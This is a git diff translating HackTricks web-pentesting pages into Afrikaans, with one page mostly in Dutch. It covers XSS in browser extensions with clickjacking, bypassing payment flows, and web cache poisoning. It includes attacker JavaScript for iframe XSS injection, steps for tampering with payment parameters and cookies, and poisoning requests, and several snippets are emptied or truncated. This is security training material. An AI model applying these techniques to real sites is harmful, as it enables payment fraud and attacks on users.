+'n Openlik toeganklike HTML-bladsy, **`message.html`**, is ontwerp om dinamies inhoud by die dokumentliggaam te voeg op grond van die parameters in die URL:
 ```javascript
 $(document).ready(() => {
-  let urlParams = new URLSearchParams(window.location.search);
-  let userContent = urlParams.get("content");
-  $(document.body).html(`${userContent} `);
-  $('#detailBtn').on('click', () => {
-    let destinationURL = urlParams.get("redirect");
-    chrome.tabs.create({ url: destinationURL });
-  });
+let urlParams = new URLSearchParams(window.location.search);
+let userContent = urlParams.get("content");
+$(document.body).html(`${userContent} `);
+$('#detailBtn').on('click', () => {
+let destinationURL = urlParams.get("redirect");
+chrome.tabs.create({ url: destinationURL });
+});
 });
 ```
-
-A malicious script is executed on an adversary's page, modifying the `content` parameter of the Iframe's source to introduce a **XSS payload**. This is achieved by updating the Iframe's source to include a harmful script:
-
+'n Kwaadwillige skripsie word uitgevoer op 'n teenstander se bladsy, waar die `content` parameter van die Iframe se bron gewysig word om 'n **XSS-payload** in te sluit. Dit word bereik deur die Iframe se bron op te dateer om 'n skadelike skripsie in te sluit:
 ```javascript
 setTimeout(() => {
-  let targetFrame = document.querySelector("iframe").src;
-  let baseURL = targetFrame.split('?')[0];
-  let xssPayload = "";
-  let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`;
+let targetFrame = document.querySelector("iframe").src;
+let baseURL = targetFrame.split('?')[0];
+let xssPayload = "";
+let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`;
 
-  document.querySelector("iframe").src = maliciousURL;
+document.querySelector("iframe").src = maliciousURL;
 }, 1000);
 ```
-
-An overly permissive Content Security Policy such as:
-
+'n Oormatig toegeeflike Inhoudsveiligheidsbeleid soos:
 ```json
 "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';"
 ```
+maak die uitvoering van JavaScript moontlik, wat die stelsel vatbaar maak vir XSS-aanvalle.
 
-allows the execution of JavaScript, making the system vulnerable to XSS attacks.
-
-An alternative approach to provoke the XSS involves creating an Iframe element and setting its source to include the harmful script as the `content` parameter:
-
+'n Alternatiewe benadering om die XSS uit te lok, behels die skep van 'n Iframe-element en die instelling van sy bron om die skadelike skrip as die `content`-parameter in te sluit:
 ```javascript
 let newFrame = document.createElement("iframe");
 newFrame.src = "chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?content=" +
-  encodeURIComponent("");
+encodeURIComponent("");
 document.body.append(newFrame);
 ```
+## DOM-gebaseerde XSS + ClickJacking
 
-## DOM-based XSS + ClickJacking
-
-This example was taken from the [original post writeup](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/).
-
-The core issue arises from a DOM-based Cross-site Scripting (XSS) vulnerability located in **`/html/bookmarks.html`**. The problematic JavaScript, part of **`bookmarks.js`**, is detailed below:
+Hierdie voorbeeld is geneem uit die [oorspronklike pos skryfwerk](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/).
 
+Die kernprobleem ontstaan uit 'n DOM-gebaseerde Cross-site Scripting (XSS) kwesbaarheid wat geleë is in **`/html/bookmarks.html`**. Die problematiese JavaScript, deel van **`bookmarks.js`**, word hieronder beskryf:
 ```javascript
 $('#btAdd').on('click', function() {
-    var bookmarkName = $('#txtName').val();
-    if ($('.custom-button .label').filter(function() {
-        return $(this).text() === bookmarkName;
-    }).length) return false;
+var bookmarkName = $('#txtName').val();
+if ($('.custom-button .label').filter(function() {
+return $(this).text() === bookmarkName;
+}).length) return false;
 
-    var bookmarkItem = $('
');
-    bookmarkItem.html('' + bookmarkName + '');
-    bookmarkItem.append('');
-    bookmarkItem.attr('data-title', bookmarkName);
-    bookmarkItem.data('timestamp', (new Date().getTime()));
-    $('section.bookmark-container .existing-items').append(bookmarkItem);
-    persistData();
+var bookmarkItem = $('
');
+bookmarkItem.html('' + bookmarkName + '');
+bookmarkItem.append('');
+bookmarkItem.attr('data-title', bookmarkName);
+bookmarkItem.data('timestamp', (new Date().getTime()));
+$('section.bookmark-container .existing-items').append(bookmarkItem);
+persistData();
 });
 ```
+Hierdie stukkie haal die **waarde** uit die **`txtName`** invoerveld en gebruik **string-konkatenasie om HTML te genereer**, wat dan aan die DOM geheg word deur gebruik te maak van jQuery se `.append()` funksie.
 
-This snippet fetches the **value** from the **`txtName`** input field and uses **string concatenation to generate HTML**, which is then appended to the DOM using jQuery’s `.append()` function.
+Normaalweg sal die Chrome-uitbreiding se Inhoudsbeveiligingsbeleid (CSP) sulke kwesbaarhede voorkom. Tog is uitbuiting steeds moontlik as gevolg van **CSP-verslapping met 'unsafe-eval'** en die gebruik van jQuery se DOM-manipulasie-metodes (wat [`globalEval()`](https://api.jquery.com/jquery.globaleval/) gebruik om skripte na [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) te stuur by DOM-invoeging).
 
-Typically, the Chrome extension's Content Security Policy (CSP) would prevent such vulnerabilities. However, due to **CSP relaxation with ‘unsafe-eval’** and the use of jQuery’s DOM manipulation methods (which employ [`globalEval()`](https://api.jquery.com/jquery.globaleval/) to pass scripts to [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) upon DOM insertion), exploitation is still possible.
-
-While this vulnerability is significant, its exploitation is usually contingent on user interaction: visiting the page, entering an XSS payload, and activating the “Add” button.
-
-To enhance this vulnerability, a secondary **clickjacking** vulnerability is exploited. The Chrome extension's manifest showcases an extensive `web_accessible_resources` policy:
+Hoewel hierdie kwesbaarheid betekenisvol is, is die uitbuiting gewoonlik afhanklik van gebruikersinteraksie: die besoek aan die bladsy, die invoer van 'n XSS-lading en die aktivering van die "Voeg by" knoppie.
 
+Om hierdie kwesbaarheid te verbeter, word 'n sekondêre **clickjacking**-kwesbaarheid uitgebuit. Die manifest van die Chrome-uitbreiding toon 'n uitgebreide `web_accessible_resources`-beleid:
 ```json
 "web_accessible_resources": [
-    "html/bookmarks.html",
-    "dist/*",
-    "assets/*",
-    "font/*",
-    [...]
+"html/bookmarks.html",
+"dist/*",
+"assets/*",
+"font/*",
+[...]
 ],
 ```
+Veral die **`/html/bookmarks.html`** bladsy is vatbaar vir framing en dus kwesbaar vir **clickjacking**. Hierdie kwesbaarheid word gebruik om die bladsy binne 'n aanvaller se webwerf te rame, en dit te oorlê met DOM-elemente om die koppelvlak bedrieglik te herontwerp. Hierdie manipulasie lei slagoffers om onbedoeld met die onderliggende uitbreiding te interaksieer.
 
-Notably, the **`/html/bookmarks.html`** page is prone to framing, thus vulnerable to **clickjacking**. This vulnerability is leveraged to frame the page within an attacker’s site, overlaying it with DOM elements to redesign the interface deceptively. This manipulation leads victims to interact with the underlying extension unintentionally.
-
-## References
+## Verwysings
 
 * [https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/](https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/)
 * [https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

diff --git a/pentesting-web/bypass-payment-process.md b/pentesting-web/bypass-payment-process.md
index acda14d3d..8a7fa7098 100644
--- a/pentesting-web/bypass-payment-process.md
+++ b/pentesting-web/bypass-payment-process.md
@@ -1,61 +1,61 @@
-# Bypass Payment Process
+# Bypass Betalingsproses
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 

 
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
+Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
 
 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 
 ***
 
-## Payment Bypass Techniques
+## Bypas Betalings Tegnieke
 
-### Request Interception
-During the transaction process, it is crucial to monitor the data being exchanged between the client and the server. This can be done by intercepting all requests. Within these requests, look out for parameters with significant implications, such as:
+### Versoek Onderbreking
+Tydens die transaksieproses is dit noodsaaklik om die data wat uitgewissel word tussen die kliënt en die bediener te monitor. Dit kan gedoen word deur alle versoek te onderskep. Binne hierdie versoek moet jy let op parameters met belangrike implikasies, soos:
 
-- **Success**: This parameter often indicates the status of the transaction.
-- **Referrer**: It might point to the source from where the request originated.
-- **Callback**: This is typically used for redirecting the user after a transaction is completed.
+- **Sukses**: Hierdie parameter dui dikwels die status van die transaksie aan.
+- **Verwysingsbron**: Dit kan dui op die bron waarvandaan die versoek afkomstig is.
+- **Terugroep**: Dit word tipies gebruik om die gebruiker na 'n voltooide transaksie om te lei.
 
-### URL Analysis
-If you encounter a parameter that contains a URL, especially one following the pattern _example.com/payment/MD5HASH_, it requires closer examination. Here's a step-by-step approach:
+### URL-analise
+As jy 'n parameter teëkom wat 'n URL bevat, veral een wat die patroon _example.com/payment/MD5HASH_ volg, vereis dit noukeurige ondersoek. Hier is 'n stap-vir-stap benadering:
 
-1. **Copy the URL**: Extract the URL from the parameter value.
-2. **New Window Inspection**: Open the copied URL in a new browser window. This action is critical for understanding the transaction's outcome.
+1. **Kopieer die URL**: Haal die URL uit die parameterwaarde.
+2. **Nuwe venster-inspeksie**: Maak die gekopieerde URL oop in 'n nuwe blaaier-venster. Hierdie aksie is krities om die uitkoms van die transaksie te verstaan.
 
-### Parameter Manipulation
-1. **Change Parameter Values**: Experiment by altering the values of parameters like _Success_, _Referrer_, or _Callback_. For instance, changing a parameter from `false` to `true` can sometimes reveal how the system handles these inputs.
-2. **Remove Parameters**: Try removing certain parameters altogether to see how the system reacts. Some systems might have fallbacks or default behaviors when expected parameters are missing.
+### Parametermanipulasie
+1. **Verander parameterwaardes**: Eksperimenteer deur die waardes van parameters soos _Sukses_, _Verwysingsbron_ of _Terugroep_ te verander. Byvoorbeeld, deur 'n parameter van `false` na `true` te verander, kan dit soms onthul hoe die stelsel hierdie insette hanteer.
+2. **Verwyder parameters**: Probeer om sekere parameters heeltemal te verwyder om te sien hoe die stelsel reageer. Sommige stelsels mag fallbacks of verstekgedrag hê wanneer verwagte parameters ontbreek.
 
-### Cookie Tampering
-1. **Examine Cookies**: Many websites store crucial information in cookies. Inspect these cookies for any data related to payment status or user authentication.
-2. **Modify Cookie Values**: Alter the values stored in the cookies and observe how the website's response or behavior changes.
+### Koekie-manipulasie
+1. **Ondersoek koekies**: Baie webwerwe stoor belangrike inligting in koekies. Ondersoek hierdie koekies vir enige data wat verband hou met betalingsstatus of gebruikersverifikasie.
+2. **Verander koekiewaardes**: Verander die waardes wat in die koekies gestoor word en let op hoe die webwerf se respons of gedrag verander.
 
-### Session Hijacking
-1. **Session Tokens**: If session tokens are used in the payment process, try capturing and manipulating them. This might give insights into session management vulnerabilities.
+### Sessie-kaaping
+1. **Sessie-tokens**: As sessie-tokens gebruik word in die betalingsproses, probeer om hulle vas te vang en te manipuleer. Dit kan insig gee in sessiebestuurskwesbaarhede.
 
-### Response Tampering
-1. **Intercept Responses**: Use tools to intercept and analyze the responses from the server. Look for any data that might indicate a successful transaction or reveal the next steps in the payment process.
-2. **Modify Responses**: Attempt to modify the responses before they are processed by the browser or the application to simulate a successful transaction scenario.
+### Responsmanipulasie
+1. **Onderskep respons**: Gebruik gereedskap om die respons van die bediener te onderskep en te analiseer. Soek na enige data wat 'n suksesvolle transaksie kan aandui of die volgende stappe in die betalingsproses kan onthul.
+2. **Verander respons**: Probeer om die respons voor verwerking deur die blaaier of die toepassing te verander om 'n suksesvolle transaksiesituasie te simuleer.
 
 
 

 
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
+Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
 
 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 
@@ -63,16 +63,14 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

-
-
diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md
index c06dbc526..bcb37b906 100644
--- a/pentesting-web/cache-deception.md
+++ b/pentesting-web/cache-deception.md
@@ -1,233 +1,199 @@
-# Cache Poisoning and Cache Deception
+# Cache-vergiftiging en Cache-misleiding
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Andere manieren om HackTricks te ondersteunen:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks wilt downloaden in PDF-formaat**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)!
+* Koop de [**officiële PEASS & HackTricks merchandise**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family)
+* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 

 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om eenvoudig workflows te bouwen en te automatiseren met behulp van 's werelds meest geavanceerde communitytools.\
+Krijg vandaag nog toegang:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
-## The difference
+## Het verschil
 
-> **What is the difference between web cache poisoning and web cache deception?**
+> **Wat is het verschil tussen cache-vergiftiging en cache-misleiding?**
 >
-> * In **web cache poisoning**, the attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users.
-> * In **web cache deception**, the attacker causes the application to store some sensitive content belonging to another user in the cache, and the attacker then retrieves this content from the cache.
+> * Bij **cache-vergiftiging** zorgt de aanvaller ervoor dat de applicatie schadelijke inhoud in de cache opslaat, en deze inhoud wordt vanuit de cache aan andere gebruikers van de applicatie geserveerd.
+> * Bij **cache-misleiding** zorgt de aanvaller ervoor dat de applicatie gevoelige inhoud van een andere gebruiker in de cache opslaat, en de aanvaller haalt vervolgens deze inhoud uit de cache.
 
-## Cache Poisoning
+## Cache-vergiftiging
 
-Cache poisoning is aimed at manipulating the client-side cache to force clients to load resources that are unexpected, partial, or under the control of an attacker. The extent of the impact is contingent on the popularity of the affected page, as the tainted response is served exclusively to users visiting the page during the period of cache contamination.
+Cache-vergiftiging is gericht op het manipuleren van de cache aan de clientzijde om clients te dwingen onverwachte, gedeeltelijke of door een aanvaller gecontroleerde bronnen te laden. De omvang van de impact is afhankelijk van de populariteit van de getroffen pagina, aangezien de besmette respons uitsluitend wordt geserveerd aan gebruikers die de pagina bezoeken tijdens de periode van cache-verontreiniging.
 
-The execution of a cache poisoning assault involves several steps:
+De uitvoering van een cache-vergiftigingsaanval omvat verschillende stappen:
 
-1. **Identification of Unkeyed Inputs**: These are parameters that, although not required for a request to be cached, can alter the response returned by the server. Identifying these inputs is crucial as they can be exploited to manipulate the cache.
-  
-2. **Exploitation of the Unkeyed Inputs**: After identifying the unkeyed inputs, the next step involves figuring out how to misuse these parameters to modify the server's response in a way that benefits the attacker.
+1. **Identificatie van niet-geïndexeerde invoer**: Dit zijn parameters die, hoewel niet vereist voor een verzoek om in de cache te worden opgeslagen, de respons die door de server wordt teruggestuurd kunnen wijzigen. Het identificeren van deze invoer is cruciaal, omdat ze kunnen worden misbruikt om de cache te manipuleren.
 
-3. **Ensuring the Poisoned Response is Cached**: The final step is to ensure that the manipulated response is stored in the cache. This way, any user accessing the affected page while the cache is poisoned will receive the tainted response.
+2. **Misbruik van de niet-geïndexeerde invoer**: Nadat de niet-geïndexeerde invoer is geïdentificeerd, omvat de volgende stap het achterhalen van hoe deze parameters kunnen worden misbruikt om de respons van de server op een manier te wijzigen die de aanvaller ten goede komt.
 
-### Discovery: Check HTTP headers
+3. **Zorgen dat de vergiftigde respons in de cache wordt opgeslagen**: De laatste stap is ervoor te zorgen dat de gemanipuleerde respons in de cache wordt opgeslagen. Op deze manier ontvangt elke gebruiker die de getroffen pagina bezoekt terwijl de cache is vergiftigd, de besmette respons.
 
-Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
+### Ontdekking: Controleer HTTP-headers
 
-### Discovery: Caching 400 code
+Gewoonlijk is er bij een respons die **in de cache is opgeslagen** een **header die dit aangeeft**, je kunt controleren op welke headers je moet letten in deze post: [**HTTP-cacheheaders**](../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
 
-If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).\
-A badly configured header could be just `\:` as a header.\
-_Note that sometimes these kinds of status codes aren't cached so this test will be useless._
+### Ontdekking: Caching van code 400
 
-### Discovery: Identify and evaluate unkeyed inputs
+Als je denkt dat de respons in een cache wordt opgeslagen, kun je proberen **verzoeken te verzenden met een slechte header**, waarop normaal gesproken wordt gereageerd met een **statuscode 400**. Probeer vervolgens het verzoek normaal te openen en als de **respons een statuscode 400 is**, weet je dat het kwetsbaar is (en je kunt zelfs een DoS uitvoeren).\
+Een slecht geconfigureerde header kan gewoon `\:` als een header zijn.\
+Merk op dat deze soorten statuscodes soms niet in de cache worden opgeslagen, dus deze test is nutteloos.
 
-You could use [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load the script from there:
+### Ontdekking: Identificeer en evalueer niet-geïndexeerde invoer
 
+Je kunt [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) gebruiken om parameters en headers te **brute-forcen** die mogelijk de respons van de pagina **veranderen**. Bijvoorbeeld, een pagina kan de header `X-Forwarded-For` gebruiken om aan te geven dat de client het script van daar moet laden:
 ```markup
 
 ```
+### Lokaliseer 'n skadelike reaksie van die agterste bediener
 
-### Elicit a harmful response from the back-end server
+Met die geïdentifiseerde parameter/header, ondersoek hoe dit **gesaniteer** word en **waar** dit die respons van die header **beïnvloed**. Kan jy dit enigsins misbruik (voer 'n XSS uit of laai 'n JS-kode wat deur jou beheer word? Voer 'n DoS uit?...)
 
-With the parameter/header identified check how it is being **sanitised** and **where** is it **getting reflected** or affecting the response from the header. Can you abuse it anyway (perform an XSS or load a JS code controlled by you? perform a DoS?...)
+### Kry die gekasheerde respons
 
-### Get the response cached
+Sodra jy die **bladsy** geïdentifiseer het wat misbruik kan word, asook die **parameter**/**header** wat gebruik moet word en **hoe** om dit te **misbruik**, moet jy die bladsy gekasheer kry. Afhangende van die bron wat jy in die kas wil kry, kan dit 'n rukkie neem en jy moet dalk vir verskeie sekondes probeer.\
+Die **`X-Cache`**-header in die respons kan baie nuttig wees, aangesien dit die waarde **`miss`** kan hê wanneer die versoek nie gekasheer is nie, en die waarde **`hit`** wanneer dit gekasheer is.\
+Die **`Cache-Control`**-header is ook interessant om te weet of 'n bron gekasheer word en wanneer die volgende keer sal wees dat die bron weer gekasheer sal word: `Cache-Control: public, max-age=1800`\
+'n Ander interessante header is **`Vary`**. Hierdie header word dikwels gebruik om **bykomende headers aan te dui** wat as **deel van die kas-sleutel** beskou word, selfs al is hulle normaalweg nie sleutelwaardig nie. Daarom kan die gebruiker, as hy die `User-Agent` van die slagoffer ken, die kas vergiftig vir gebruikers wat daardie spesifieke `User-Agent` gebruik.\
+'n Nog 'n header wat verband hou met die kas is **`Age`**. Dit definieer die tyd in sekondes wat die voorwerp in die proxy-kas was.
 
-Once you have **identified** the **page** that can be abused, which **parameter**/**header** to use and **how** to **abuse** it, you need to get the page cached. Depending on the resource you are trying to get in the cache this could take some time, you might need to be trying for several seconds.\
-The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\
-The header **`Cache-Control`** is also interesting to know if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`\
-Another interesting header is **`Vary`**. This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.\
-One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache.
+Wees **versigtig met die headers** wat jy gebruik wanneer jy 'n versoek kashier, omdat sommige van hulle **onverwags as sleutelwaardig gebruik kan word** en die slagoffer dieselfde header moet gebruik. Toets altyd 'n Kasvergiftiging met **verskillende webblaaie** om te sien of dit werk.
 
-When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.
+## Voorbeelde van uitbuiting
 
-## Exploiting Examples
-
-### Easiest example
-
-A header like `X-Forwarded-For` is being reflected in the response unsanitized.\
-You can send a basic XSS payload and poison the cache so everybody that accesses the page will be XSSed:
+### Maklikste voorbeeld
 
+'n Header soos `X-Forwarded-For` word ongesaniteer in die respons weerspieël.\
+Jy kan 'n basiese XSS-lading stuur en die kas vergiftig sodat almal wat die bladsy besoek, XSS sal ervaar:
 ```markup
 GET /en?region=uk HTTP/1.1
 Host: innocent-website.com
 X-Forwarded-Host: a.">"
 ```
+_Merk op dat dit 'n versoek na `/en?region=uk` sal vergiftig en nie na `/en` nie_
 
-_Note that this will poison a request to `/en?region=uk` not to `/en`_
-
-### Using web cache poisoning to exploit cookie-handling vulnerabilities
-
-Cookies could also be reflected on the response of a page. If you can abuse it to cause an XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
+### Gebruik van webgeheuevergiftiging om koekiehanteringskwesbaarhede uit te buit
 
+Koekies kan ook weerspieël word in die respons van 'n bladsy. As jy dit kan misbruik om byvoorbeeld 'n XSS te veroorsaak, kan jy XSS moontlik uitbuit in verskeie kliënte wat die skadelike geheue-respons laai.
 ```markup
 GET / HTTP/1.1
 Host: vulnerable.com
